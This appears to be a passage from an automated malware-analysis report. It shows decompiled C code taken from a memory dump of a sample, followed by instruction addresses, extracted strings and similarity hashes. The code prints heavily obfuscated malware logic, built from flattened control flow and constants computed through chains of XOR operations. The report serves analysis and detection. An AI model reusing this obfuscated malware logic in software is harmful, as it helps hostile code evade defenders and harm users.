				_v60 = _v60 ^ 0x0009ccb2;
				_v68 = 0xbcd2de;
				_v68 = _v68 ^ 0x4b67678a;
				_v68 = _v68 ^ 0x4bd84e26;
				_v76 = 0x278312;
				_t412 = 0x17;
				_v76 = _v76 / _t412;
				_v76 = _v76 ^ 0x0004a010;
				_v88 = 0x612173;
				_v88 = _v88 + 0x4d5c;
				_v88 = _v88 | 0x60685b7e;
				_v88 = _v88 ^ 0x606fbfd4;
				_v96 = 0xe9ef98;
				_v96 = _v96 | 0x7849e75b;
				_v96 = _v96 + 0xffff3de5;
				_v96 = _v96 ^ 0x78e356f5;
				_v44 = 0xc2407;
				_v44 = _v44 * 0xb;
				_v44 = _v44 ^ 0x00871786;
				_v136 = 0xac7439;
				_v136 = _v136 | 0x4122d33a;
				_v136 = _v136 + 0xffff5987;
				_v136 = _v136 ^ 0x41aafbcd;
				while(1) {
					L1:
					_t305 =  &_v140; // 0x4c6d225e
					_t381 =  *_t305;
					while(1) {
						L2:
						while(1) {
							L3:
							_t413 = 0xac00171;
							while(1) {
								L4:
								_t455 = _t445 - _t413;
								if(_t455 > 0) {
									goto L18;
								}
								L5:
								if(_t455 == 0) {
									E1000C132(_v36, _v112, _v120, _v16, _v144, _t450);
									_t452 =  &(_t452[4]);
									goto L17;
								} else {
									if(_t445 == 0x466c0f4) {
										return E100088FC(_v88, _v96, _v44, _v136, _t405);
									}
									if(_t445 == 0x48455a6) {
										_t442 = _t442 + 0x2c;
										asm("sbb esi, esi");
										_t445 = (_t445 & 0x041a8486) + 0xbba06aa;
										continue;
									} else {
										if(_t445 == 0x5622ce3) {
											_t398 = E10008D7C(_v176, _v28, _v128, _t413, _v132, _t405, _v84,  &_v12, _a4, _v24, _t413, _t413,  &_v4, _t413, _v100, _t413, _v72, _t413, _v40);
											_t452 =  &(_t452[0x11]);
											if(_t398 == 0) {
												L17:
												_t445 = 0xbba06aa;
												while(1) {
													L1:
													_t305 =  &_v140; // 0x4c6d225e
													_t381 =  *_t305;
													goto L2;
												}
											} else {
												_t400 = E1000C0A4();
												_t445 = 0xfd48b30;
												_t381 = _v12 * 0x2c + _t405;
												_v140 = _t381;
												_t442 =  >=  ? _t405 : (_t400 & 0x0000001f) * 0x2c + _t405;
												L2:
												L3:
												_t413 = 0xac00171;
												continue;
											}
											L32:
											return _t381;
										} else {
											if(_t445 == _t435) {
												E1001DE4A( &_v8, _v92, _v124, _v184, _v108, _v104, _v20, _t450);
												_t445 =  !=  ? 0xac00171 : 0x48455a6;
												_t381 = E10010839(_v64, _v20, _v160, _v116);
												_t452 =  &(_t452[9]);
												L28:
												_t435 = 0x88735a4;
												_t413 = 0xac00171;
											} else {
												if(_t445 == 0xa5fe53e) {
													_t445 = 0xb563e81;
													while(1) {
														L4:
														_t455 = _t445 - _t413;
														if(_t455 > 0) {
															goto L18;
														}
														goto L5;
													}
													goto L18;
												}
											}
										}
									}
								}
								L29:
								if(_t445 != 0xd083986) {
									_t381 = _v140;
									continue;
								}
								goto L32;
								L18:
								if(_t445 == 0xb563e81) {
									_push(_t413);
									_t381 = E100134E7(_t413, 0x20000);
									_t405 = _t381;
									_t452 =  &(_t452[3]);
									if(_t405 == 0) {
										_t445 = 0xd083986;
										goto L28;
									} else {
										_t445 = 0xfbfa577;
										goto L1;
									}
								} else {
									if(_t445 == 0xbba06aa) {
										E100088FC(_v52, _v60, _v68, _v76, _t450);
										_t452 =  &(_t452[3]);
										_t445 = 0x466c0f4;
										while(1) {
											L1:
											_t305 =  &_v140; // 0x4c6d225e
											_t381 =  *_t305;
											goto L2;
										}
									} else {
										if(_t445 == 0xfbfa577) {
											_push(_t413);
											_t450 = E100134E7(_t413, 0x2000);
											_t452 =  &(_t452[3]);
											_t445 =  !=  ? 0x5622ce3 : 0x466c0f4;
											while(1) {
												L1:
												_t305 =  &_v140; // 0x4c6d225e
												_t381 =  *_t305;
												goto L2;
											}
										} else {
											if(_t445 == 0xfd48b30) {
												_t393 = E10015F55( *_t442, _v168, _a4, _v48);
												_t452 =  &(_t452[3]);
												_v20 = _t393;
												_t381 = _v140;
												_t435 = 0x88735a4;
												_t445 =  !=  ? 0x88735a4 : 0x48455a6;
												goto L3;
											}
										}
									}
								}
								goto L29;
							}
						}
					}
				}
			}

0x1001a71c
0x1001a725
0x1001a72c
0x1001a733
0x1001a73a
0x1001a73b
0x1001a73c
0x1001a741
0x1001a74c
0x1001a74f
0x1001a759
0x1001a761
0x1001a763
0x1001a76b
0x1001a770
0x1001a778
0x1001a77a
0x1001a782
0x1001a78a
0x1001a792
0x1001a79a
0x1001a79f
0x1001a7a4
0x1001a7a9
0x1001a7ae
0x1001a7b6
0x1001a7bb
0x1001a7c3
0x1001a7cb
0x1001a7d9
0x1001a7de
0x1001a7e4
0x1001a7ec
0x1001a7f4
0x1001a7fc
0x1001a804
0x1001a80c
0x1001a811
0x1001a819
0x1001a821
0x1001a829
0x1001a831
0x1001a836
0x1001a83b
0x1001a843
0x1001a84e
0x1001a859
0x1001a864
0x1001a86f
0x1001a877
0x1001a882
0x1001a88a
0x1001a892
0x1001a89a
0x1001a8a2
0x1001a8aa
0x1001a8b2
0x1001a8ba
0x1001a8bf
0x1001a8c7
0x1001a8cf
0x1001a8dc
0x1001a8dd
0x1001a8e1
0x1001a8e9
0x1001a8ee
0x1001a8f6
0x1001a90a
0x1001a913
0x1001a91e
0x1001a926
0x1001a92e
0x1001a936
0x1001a93e
0x1001a946
0x1001a94c
0x1001a951
0x1001a957
0x1001a95c
0x1001a964
0x1001a96c
0x1001a974
0x1001a97c
0x1001a987
0x1001a992
0x1001a99d
0x1001a9a5
0x1001a9ad
0x1001a9b2
0x1001a9ba
0x1001a9c5
0x1001a9d0
0x1001a9db
0x1001a9e6
0x1001a9f1
0x1001a9fc
0x1001aa07
0x1001aa0f
0x1001aa1a
0x1001aa27
0x1001aa28
0x1001aa2c
0x1001aa34
0x1001aa3c
0x1001aa44
0x1001aa57
0x1001aa5e
0x1001aa69
0x1001aa71
0x1001aa79
0x1001aa7e
0x1001aa86
0x1001aa8e
0x1001aa93
0x1001aa9b
0x1001aa9f
0x1001aaa7
0x1001aaaf
0x1001aab7
0x1001aabc
0x1001aac4
0x1001aacc
0x1001aad4
0x1001aadc
0x1001aae7
0x1001aaf2
0x1001aafd
0x1001ab05
0x1001ab0d
0x1001ab1a
0x1001ab1e
0x1001ab26
0x1001ab34
0x1001ab3d
0x1001ab41
0x1001ab49
0x1001ab54
0x1001ab5f
0x1001ab6c
0x1001ab74
0x1001ab83
0x1001ab86
0x1001ab8d
0x1001ab91
0x1001ab99
0x1001aba1
0x1001aba6
0x1001abae
0x1001abb2
0x1001abba
0x1001abc5
0x1001abd0
0x1001abdb
0x1001abf1
0x1001abf8
0x1001ac03
0x1001ac0e
0x1001ac19
0x1001ac24
0x1001ac36
0x1001ac39
0x1001ac40
0x1001ac4b
0x1001ac53
0x1001ac5b
0x1001ac63
0x1001ac6b
0x1001ac73
0x1001ac7b
0x1001ac83
0x1001ac8b
0x1001ac9e
0x1001aca5
0x1001acb0
0x1001acb8
0x1001acc0
0x1001acc8
0x1001acd0
0x1001acd0
0x1001acd0
0x1001acd0
0x1001acd4
0x1001acd4
0x1001acd9
0x1001acd9
0x1001acd9
0x1001acde
0x1001acde
0x1001acde
0x1001ace0
0x00000000
0x00000000
0x1001ace6
0x1001ace6
0x1001ae47
0x1001ae4c
0x00000000
0x1001acec
0x1001acf2
0x00000000
0x1001af96
0x1001acfe
0x1001ae14
0x1001ae19
0x1001ae21
0x00000000
0x1001ad04
0x1001ad0a
0x1001add7
0x1001addc
0x1001ade1
0x1001ae4f
0x1001ae4f
0x1001acd0
0x1001acd0
0x1001acd0
0x1001acd0
0x00000000
0x1001acd0
0x1001ade3
0x1001adea
0x1001adf2
0x1001ae04
0x1001ae08
0x1001ae0c
0x1001acd4
0x1001acd9
0x1001acd9
0x00000000
0x1001acd9
0x1001afa3
0x1001afa3
0x1001ad0c
0x1001ad0e
0x1001ad49
0x1001ad70
0x1001ad73
0x1001ad78
0x1001af5f
0x1001af5f
0x1001af64
0x1001ad10
0x1001ad16
0x1001ad1c
0x1001acde
0x1001acde
0x1001acde
0x1001ace0
0x00000000
0x00000000
0x00000000
0x1001ace0
0x00000000
0x1001acde
0x1001ad16
0x1001ad0e
0x1001ad0a
0x1001acfe
0x1001af69
0x1001af6f
0x1001af71
0x00000000
0x1001af71
0x00000000
0x1001ae59
0x1001ae5f
0x1001af3b
0x1001af42
0x1001af47
0x1001af49
0x1001af4e
0x1001af5a
0x00000000
0x1001af50
0x1001af50
0x00000000
0x1001af50
0x1001ae65
0x1001ae6b
0x1001af19
0x1001af1e
0x1001af21
0x1001acd0
0x1001acd0
0x1001acd0
0x1001acd0
0x00000000
0x1001acd0
0x1001ae71
0x1001ae77
0x1001aed7
0x1001aee3
0x1001aee5
0x1001aef4
0x1001acd0
0x1001acd0
0x1001acd0
0x1001acd0
0x00000000
0x1001acd0
0x1001ae79
0x1001ae7f
0x1001ae9d
0x1001aea2
0x1001aea5
0x1001aeb3
0x1001aeb7
0x1001aebc
0x00000000
0x1001aebc
0x1001ae7f
0x1001ae77
0x1001ae6b
0x00000000
0x1001ae5f
0x1001acde
0x1001acd9
0x1001acd4

Strings

>_, xrefs: 1001A76B
/, xrefs: 1001A74F
>_, xrefs: 1001AD10
k7, xrefs: 1001AB41
ev?, xrefs: 1001A8F6
~[h`, xrefs: 1001AC5B
k, xrefs: 1001AB0D
o%, xrefs: 1001A8CF
"w), xrefs: 1001A946
kb, xrefs: 1001A8BF
^"mL, xrefs: 1001ACD0
M%, xrefs: 1001AADC
[Ix, xrefs: 1001AC73
4u, xrefs: 1001AB6C

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: "w)$/$4u$>_$>_$M%$[Ix$^"mL$ev?$kb$~[h`$k$k7$o%
API String ID: 0-1832709694
Opcode ID: 1493985da5fe58dff814a62fa9980a3cf1359fa1bf4cf5df2183c8543db480a5
Instruction ID: 83ee361e6c301f4f12389c0ed77fdb1ab42eb300fd773f39f58ff0551d3aee71
Opcode Fuzzy Hash: 1493985da5fe58dff814a62fa9980a3cf1359fa1bf4cf5df2183c8543db480a5
Instruction Fuzzy Hash: 881232B29083809FD3A4CF65C546A4FBBE1FBC5348F01892DE6DA96220D7B19949DF43

Uniqueness

Uniqueness Score: -1.00%

Function 10004A13, Relevance: 16.7, Strings: 13, Instructions: 469
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E10004A13(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				unsigned int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				void* _t536;
				void* _t540;
				void* _t553;
				void* _t556;
				void* _t560;
				void* _t563;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				void* _t572;
				signed int _t573;
				signed int _t602;
				signed int _t614;
				void* _t616;
				signed int* _t621;
				signed int* _t626;

				_t621 =  &_v1812;
				_t563 = __ecx;
				_v1584 = _v1584 & 0x00000000;
				_v1648 = 0x1f245e;
				_v1648 = _v1648 >> 0xf;
				_v1648 = _v1648 ^ 0x0200003e;
				_v1808 = 0x2320a8;
				_v1808 = _v1808 ^ 0xe5b02195;
				_v1808 = _v1808 + 0x5791;
				_v1808 = _v1808 << 7;
				_v1808 = _v1808 ^ 0xc9a7c8c4;
				_v1656 = 0xabfc03;
				_v1656 = _v1656 << 0xd;
				_v1656 = _v1656 ^ 0x7f8b3dbc;
				_v1800 = 0x396f62;
				_v1800 = _v1800 << 0x10;
				_v1800 = _v1800 >> 0xf;
				_v1800 = _v1800 + 0xffff3419;
				_v1800 = _v1800 ^ 0x00087c5e;
				_v1640 = 0x78643;
				_v1640 = _v1640 + 0xe1d;
				_v1640 = _v1640 ^ 0x00083032;
				_v1696 = 0xafb761;
				_v1696 = _v1696 + 0xfffff639;
				_v1696 = _v1696 * 0x5a;
				_v1696 = _v1696 ^ 0x3dc106d0;
				_t616 = 0x57d9d7f;
				_v1704 = 0xeb803;
				_v1704 = _v1704 ^ 0x31aa8bca;
				_t565 = 0x66;
				_v1704 = _v1704 * 0x75;
				_v1704 = _v1704 ^ 0xb005d24e;
				_v1604 = 0xa6f976;
				_v1604 = _v1604 + 0x9935;
				_v1604 = _v1604 ^ 0x00a50389;
				_v1660 = 0x2283ce;
				_v1660 = _v1660 >> 1;
				_v1660 = _v1660 ^ 0x001126a2;
				_v1764 = 0xc838b6;
				_v1764 = _v1764 / _t565;
				_v1764 = _v1764 ^ 0x69188446;
				_v1764 = _v1764 >> 6;
				_v1764 = _v1764 ^ 0x01a4a5bf;
				_v1796 = 0x868447;
				_v1796 = _v1796 * 0x32;
				_v1796 = _v1796 + 0x4a07;
				_v1796 = _v1796 << 0x10;
				_v1796 = _v1796 ^ 0x1fe850f5;
				_v1668 = 0x65bac1;
				_v1668 = _v1668 | 0x355832be;
				_v1668 = _v1668 << 0xd;
				_v1668 = _v1668 ^ 0xb75a8393;
				_v1700 = 0xdeaf28;
				_v1700 = _v1700 ^ 0x15e2c968;
				_v1700 = _v1700 + 0xffff0d81;
				_v1700 = _v1700 ^ 0x153ce63e;
				_v1588 = 0xa215ee;
				_v1588 = _v1588 ^ 0xccaec820;
				_v1588 = _v1588 ^ 0xcc00add1;
				_v1788 = 0xef8943;
				_v1788 = _v1788 + 0x3dcd;
				_v1788 = _v1788 ^ 0x6df7e931;
				_v1788 = _v1788 + 0xffffcdcf;
				_v1788 = _v1788 ^ 0x6d1078a1;
				_v1728 = 0x7719d4;
				_v1728 = _v1728 << 8;
				_v1728 = _v1728 + 0x52ce;
				_v1728 = _v1728 ^ 0x7719bf0c;
				_v1636 = 0xc9ace1;
				_v1636 = _v1636 * 0x7e;
				_v1636 = _v1636 ^ 0x634f6de4;
				_v1732 = 0x4caf28;
				_v1732 = _v1732 >> 6;
				_v1732 = _v1732 | 0x04a6706b;
				_v1732 = _v1732 ^ 0x04a81c89;
				_v1592 = 0x85d03f;
				_v1592 = _v1592 | 0xbadab3a2;
				_v1592 = _v1592 ^ 0xbad793c8;
				_v1748 = 0xcbecad;
				_t566 = 0x75;
				_v1748 = _v1748 * 0x50;
				_v1748 = _v1748 + 0xffff0bfe;
				_v1748 = _v1748 / _t566;
				_v1748 = _v1748 ^ 0x008e008f;
				_v1628 = 0xeec60d;
				_v1628 = _v1628 << 0xb;
				_v1628 = _v1628 ^ 0x7632af73;
				_v1600 = 0x7b97a2;
				_v1600 = _v1600 + 0x3aaf;
				_v1600 = _v1600 ^ 0x007f1f74;
				_v1620 = 0xc60222;
				_v1620 = _v1620 << 0xe;
				_v1620 = _v1620 ^ 0x808b6fd1;
				_v1780 = 0x7ce26f;
				_t163 =  &_v1780; // 0x7ce26f
				_t567 = 0x12;
				_v1780 =  *_t163 * 0x15;
				_v1780 = _v1780 ^ 0x31b732ff;
				_v1780 = _v1780 + 0x9a49;
				_v1780 = _v1780 ^ 0x3b84a49d;
				_v1812 = 0x99efee;
				_v1812 = _v1812 << 2;
				_v1812 = _v1812 + 0xb539;
				_v1812 = _v1812 + 0x8841;
				_v1812 = _v1812 ^ 0x02681acc;
				_v1756 = 0x9d69d0;
				_v1756 = _v1756 / _t567;
				_t568 = 0x62;
				_v1756 = _v1756 * 0x23;
				_v1756 = _v1756 / _t568;
				_v1756 = _v1756 ^ 0x0004c635;
				_v1712 = 0x978ce2;
				_v1712 = _v1712 + 0xfffff345;
				_v1712 = _v1712 + 0x9eb2;
				_v1712 = _v1712 ^ 0x0090a3b4;
				_v1612 = 0x8a14dc;
				_v1612 = _v1612 + 0xffffe0cd;
				_v1612 = _v1612 ^ 0x00826fe1;
				_v1692 = 0x4e506b;
				_v1692 = _v1692 >> 3;
				_v1692 = _v1692 >> 7;
				_v1692 = _v1692 ^ 0x000c0e36;
				_v1724 = 0x66d91b;
				_v1724 = _v1724 + 0xc8b9;
				_v1724 = _v1724 | 0xc951e6d0;
				_v1724 = _v1724 ^ 0xc97a0161;
				_v1644 = 0xbcc99d;
				_v1644 = _v1644 ^ 0x754ddf95;
				_v1644 = _v1644 ^ 0x75f70694;
				_v1772 = 0xc84c7b;
				_v1772 = _v1772 << 5;
				_v1772 = _v1772 >> 0xa;
				_v1772 = _v1772 * 9;
				_v1772 = _v1772 ^ 0x003cdb04;
				_v1720 = 0xa81aa6;
				_v1720 = _v1720 | 0xc81b82f7;
				_v1720 = _v1720 + 0xba0c;
				_v1720 = _v1720 ^ 0xc8b40911;
				_v1804 = 0xea7d27;
				_v1804 = _v1804 << 0xe;
				_v1804 = _v1804 + 0xffff8428;
				_v1804 = _v1804 << 0xc;
				_v1804 = _v1804 ^ 0x9445c3bd;
				_v1716 = 0x1d1d12;
				_v1716 = _v1716 << 0xd;
				_v1716 = _v1716 + 0xffff363d;
				_v1716 = _v1716 ^ 0xa3a1d2e0;
				_v1596 = 0x8fe42c;
				_v1596 = _v1596 + 0xf72f;
				_v1596 = _v1596 ^ 0x0099ac04;
				_v1652 = 0x8528fb;
				_v1652 = _v1652 >> 0xa;
				_v1652 = _v1652 ^ 0x000b2c65;
				_v1684 = 0x5c7d6e;
				_v1684 = _v1684 >> 1;
				_v1684 = _v1684 >> 0x10;
				_v1684 = _v1684 ^ 0x000604d2;
				_v1708 = 0x70e0ff;
				_v1708 = _v1708 ^ 0x6d955829;
				_v1708 = _v1708 | 0x5ac594cb;
				_v1708 = _v1708 ^ 0x7fe7c512;
				_v1676 = 0x1d12a0;
				_t569 = 0x59;
				_v1676 = _v1676 * 0x31;
				_v1676 = _v1676 | 0x2f98d052;
				_v1676 = _v1676 ^ 0x2f90d78d;
				_v1740 = 0xe9d805;
				_v1740 = _v1740 >> 7;
				_v1740 = _v1740 + 0xffff1b6f;
				_v1740 = _v1740 << 1;
				_v1740 = _v1740 ^ 0x000a1d2c;
				_v1688 = 0xf0ef41;
				_v1688 = _v1688 + 0x9984;
				_v1688 = _v1688 * 0x71;
				_v1688 = _v1688 ^ 0x6a956c1c;
				_v1624 = 0x479325;
				_v1624 = _v1624 + 0xbb16;
				_v1624 = _v1624 ^ 0x0041675a;
				_v1632 = 0x23182b;
				_v1632 = _v1632 >> 0xf;
				_v1632 = _v1632 ^ 0x000edf0d;
				_v1792 = 0x189eb8;
				_v1792 = _v1792 + 0x6a99;
				_v1792 = _v1792 | 0x05a56dce;
				_v1792 = _v1792 ^ 0x2b8ed7a1;
				_v1792 = _v1792 ^ 0x2e3d7f88;
				_v1616 = 0x370c4e;
				_v1616 = _v1616 ^ 0xaddb298f;
				_v1616 = _v1616 ^ 0xaded919c;
				_v1680 = 0xb010bd;
				_v1680 = _v1680 + 0xada1;
				_v1680 = _v1680 << 2;
				_v1680 = _v1680 ^ 0x02cb5915;
				_v1776 = 0x1ae294;
				_v1776 = _v1776 ^ 0xd813e7ec;
				_v1776 = _v1776 | 0x5c92919f;
				_v1776 = _v1776 * 0x5c;
				_v1776 = _v1776 ^ 0x47eb8030;
				_v1784 = 0x8b54f8;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 + 0x26f6;
				_v1784 = _v1784 * 5;
				_v1784 = _v1784 ^ 0xe2aac5ae;
				_v1760 = 0xf37aab;
				_v1760 = _v1760 >> 0xd;
				_v1760 = _v1760 / _t569;
				_v1760 = _v1760 * 0x7b;
				_v1760 = _v1760 ^ 0x0001f8eb;
				_v1768 = 0x37c10a;
				_v1768 = _v1768 << 0xe;
				_v1768 = _v1768 | 0xbf7dffef;
				_v1768 = _v1768 ^ 0xff7a043a;
				_v1664 = 0x965d8f;
				_t570 = 0x17;
				_v1664 = _v1664 * 0x62;
				_v1664 = _v1664 / _t570;
				_v1664 = _v1664 ^ 0x02855187;
				_v1672 = 0xaecdbc;
				_t571 = 0x4d;
				_v1672 = _v1672 * 0x45;
				_v1672 = _v1672 >> 0x10;
				_v1672 = _v1672 ^ 0x00042989;
				_v1736 = 0xc4a802;
				_v1736 = _v1736 << 5;
				_v1736 = _v1736 >> 9;
				_v1736 = _v1736 >> 0xf;
				_v1736 = _v1736 ^ 0x000de742;
				_v1744 = 0xf04c30;
				_v1744 = _v1744 + 0x5ee5;
				_v1744 = _v1744 / _t571;
				_v1744 = _v1744 | 0x60ad5ed9;
				_v1744 = _v1744 ^ 0x60ad79c3;
				_v1608 = 0x3852f7;
				_v1608 = _v1608 >> 0x10;
				_v1608 = _v1608 ^ 0x000a84a5;
				_v1752 = 0xf16341;
				_v1752 = _v1752 * 0x3a;
				_v1752 = _v1752 ^ 0xe15afc18;
				_v1752 = _v1752 << 0xb;
				_v1752 = _v1752 ^ 0x540ee762;
				_t614 = _v1584;
				while(1) {
					L1:
					_t536 = 0xd7661e1;
					while(1) {
						L2:
						_t572 = 0xc954d3c;
						do {
							L3:
							while(_t616 != 0x9f74bf) {
								if(_t616 == 0x19fb43b) {
									_t540 = E1001B05E();
									__eflags = E1001B0FE() - _t540;
									_t536 = 0xd7661e1;
									_t616 = 0x9f74bf;
									_t614 =  !=  ? 0xd7661e1 : 0xfe9317a;
									L2:
									_t572 = 0xc954d3c;
									continue;
								}
								if(_t616 == 0x57d9d7f) {
									_t616 = 0x19fb43b;
									continue;
								}
								if(_t616 == 0x9a75074) {
									_push(_v1752);
									_push(_v1584);
									_push(_v1608);
									_t602 = _v1744;
									_t573 = _v1736;
									L26:
									return E100074B2(_t573, _t602);
								}
								if(_t616 == 0xbd0e91f) {
									E1001E780(_v1604, __eflags, _v1660,  &_v1044);
									 *((short*)(E10001A5C( &_v1044, _v1764, _v1796))) = 0;
									E1001215E(_v1668, _v1700, __eflags,  &_v524);
									_push(_v1636);
									_push(_v1728);
									_push(_v1788);
									E100049CE( &_v1044,  &_v524, E1000416C(_v1588, 0x100016b4), _v1732, _v1592, _v1588, _v1748, _v1628);
									E1000B952(_v1600, _t548, _v1620, _v1780);
									_t553 = E1001C962(_v1812, _v1756, _t563, _v1712, _v1612,  &_v1564);
									_t621 =  &(_t621[0x13]);
									__eflags = _t553;
									if(__eflags == 0) {
										L14:
										_t616 = 0x9a75074;
										while(1) {
											L1:
											_t536 = 0xd7661e1;
											goto L2;
										}
									}
									_t536 = 0xd7661e1;
									__eflags = _t614 - 0xd7661e1;
									_t572 = 0xc954d3c;
									_t616 =  ==  ? 0xc954d3c : 0xf3291be;
									continue;
								}
								if(_t616 == _t572) {
									_push( &_v1580);
									_t556 = E1000DC24(_v1692, _t572, _v1724, _v1644,  &_v1564, _v1772, _v1584, _v1720);
									_t621 =  &(_t621[8]);
									__eflags = _t556;
									if(__eflags != 0) {
										E100074B2(_v1804, _v1716, _v1596, _v1580, _v1652);
										E100074B2(_v1684, _v1708, _v1676, _v1576, _v1740);
										_t621 =  &(_t621[6]);
									}
									goto L14;
								}
								_t635 = _t616 - 0xf3291be;
								if(_t616 != 0xf3291be) {
									goto L23;
								}
								_push(_v1792);
								_push(0);
								_push(_t572);
								_push( &_v1564);
								_push(_v1632);
								_push(_v1624);
								_push(_v1688);
								_t560 = E1000D1FD(0,  &_v1580, _t635);
								_t626 =  &(_t621[7]);
								if(_t560 == 0) {
									L27:
									return _t560;
								}
								E100074B2(_v1616, _v1680, _v1776, _v1580, _v1784);
								_t621 =  &(_t626[3]);
								_push(_v1672);
								_push(_v1576);
								_push(_v1664);
								_t602 = _v1768;
								_t573 = _v1760;
								goto L26;
							}
							__eflags = _t614 - _t536;
							if(_t614 != _t536) {
								_t616 = 0xbd0e91f;
								goto L23;
							}
							_push(_t572);
							_t560 = E10008FCE(_v1640, _v1696, _v1704,  &_v1584, _v1648);
							_t621 =  &(_t621[5]);
							__eflags = _t560;
							if(__eflags == 0) {
								goto L27;
							}
							_t616 = 0xbd0e91f;
							goto L1;
							L23:
							__eflags = _t616 - 0x511467a;
						} while (__eflags != 0);
						return _t536;
					}
				}
			}

0x10004a13
0x10004a1d
0x10004a1f
0x10004a29
0x10004a34
0x10004a3c
0x10004a47
0x10004a4f
0x10004a57
0x10004a5f
0x10004a64
0x10004a6c
0x10004a77
0x10004a7f
0x10004a8a
0x10004a92
0x10004a97
0x10004a9c
0x10004aa4
0x10004aac
0x10004ab7
0x10004ac2
0x10004acd
0x10004ad8
0x10004aeb
0x10004af2
0x10004afd
0x10004b02
0x10004b0a
0x10004b19
0x10004b1a
0x10004b1e
0x10004b26
0x10004b31
0x10004b3c
0x10004b47
0x10004b52
0x10004b59
0x10004b64
0x10004b72
0x10004b76
0x10004b7e
0x10004b83
0x10004b8b
0x10004b98
0x10004b9c
0x10004ba4
0x10004ba9
0x10004bb1
0x10004bbc
0x10004bc7
0x10004bcf
0x10004bda
0x10004be5
0x10004bf0
0x10004bfb
0x10004c06
0x10004c11
0x10004c1c
0x10004c27
0x10004c2f
0x10004c37
0x10004c3f
0x10004c47
0x10004c4f
0x10004c57
0x10004c5c
0x10004c64
0x10004c6c
0x10004c7f
0x10004c86
0x10004c93
0x10004c9b
0x10004ca0
0x10004ca8
0x10004cb0
0x10004cbb
0x10004cc6
0x10004cd1
0x10004ce0
0x10004ce3
0x10004ce7
0x10004cf7
0x10004cfb
0x10004d03
0x10004d0e
0x10004d16
0x10004d21
0x10004d2c
0x10004d37
0x10004d42
0x10004d4d
0x10004d55
0x10004d60
0x10004d68
0x10004d6d
0x10004d70
0x10004d74
0x10004d7c
0x10004d84
0x10004d8c
0x10004d94
0x10004d99
0x10004da1
0x10004da9
0x10004db1
0x10004dc1
0x10004dca
0x10004dcb
0x10004dd5
0x10004dd9
0x10004de1
0x10004de9
0x10004df1
0x10004df9
0x10004e01
0x10004e0c
0x10004e17
0x10004e22
0x10004e2d
0x10004e35
0x10004e3d
0x10004e48
0x10004e50
0x10004e58
0x10004e60
0x10004e68
0x10004e73
0x10004e7e
0x10004e89
0x10004e91
0x10004e96
0x10004ea0
0x10004ea4
0x10004eac
0x10004eb4
0x10004ebc
0x10004ec6
0x10004ece
0x10004ed6
0x10004edb
0x10004ee3
0x10004ee8
0x10004ef0
0x10004ef8
0x10004efd
0x10004f05
0x10004f0d
0x10004f18
0x10004f23
0x10004f2e
0x10004f39
0x10004f41
0x10004f4c
0x10004f57
0x10004f5e
0x10004f66
0x10004f71
0x10004f79
0x10004f81
0x10004f89
0x10004f91
0x10004fa6
0x10004fa7
0x10004fae
0x10004fb9
0x10004fc4
0x10004fcc
0x10004fd1
0x10004fd9
0x10004fdd
0x10004fe5
0x10004ff0
0x10005003
0x1000500a
0x10005015
0x10005020
0x1000502b
0x10005036
0x10005041
0x10005049
0x10005054
0x1000505c
0x10005064
0x1000506c
0x10005074
0x1000507c
0x10005087
0x10005092
0x1000509d
0x100050a8
0x100050b3
0x100050bb
0x100050c6
0x100050ce
0x100050d6
0x100050e3
0x100050e7
0x100050ef
0x100050f7
0x100050fc
0x10005109
0x1000510d
0x10005115
0x1000511d
0x10005128
0x10005131
0x10005135
0x1000513d
0x10005147
0x10005151
0x10005159
0x10005161
0x10005176
0x10005179
0x1000518b
0x10005192
0x1000519d
0x100051b0
0x100051b1
0x100051b8
0x100051c0
0x100051cb
0x100051d3
0x100051d8
0x100051dd
0x100051e2
0x100051ea
0x100051f2
0x10005200
0x10005204
0x1000520c
0x10005214
0x1000521f
0x10005227
0x10005232
0x1000523f
0x10005243
0x1000524b
0x10005250
0x10005258
0x1000525f
0x1000525f
0x1000525f
0x10005264
0x10005264
0x10005264
0x10005269
0x00000000
0x10005269
0x1000527b
0x100054f6
0x10005502
0x10005509
0x1000550e
0x10005513
0x10005264
0x10005264
0x00000000
0x10005264
0x10005287
0x100054dd
0x00000000
0x100054dd
0x1000528f
0x1000556d
0x10005571
0x10005578
0x1000557f
0x10005583
0x10005587
0x00000000
0x1000558c
0x1000529b
0x100053e4
0x10005409
0x1000541b
0x10005421
0x1000542d
0x10005431
0x10005474
0x10005490
0x100054b4
0x100054b9
0x100054bc
0x100054be
0x100053c7
0x100053c7
0x1000525f
0x1000525f
0x1000525f
0x00000000
0x1000525f
0x1000525f
0x100054c4
0x100054ce
0x100054d0
0x100054d5
0x00000000
0x100054d5
0x100052a3
0x10005340
0x1000536e
0x10005373
0x10005376
0x10005378
0x10005397
0x100053bf
0x100053c4
0x100053c4
0x00000000
0x10005378
0x100052a9
0x100052af
0x00000000
0x00000000
0x100052b5
0x100052c0
0x100052c2
0x100052c3
0x100052c4
0x100052d4
0x100052db
0x100052e2
0x100052e7
0x100052ec
0x10005599
0x10005599
0x10005599
0x1000530f
0x10005314
0x10005317
0x1000531e
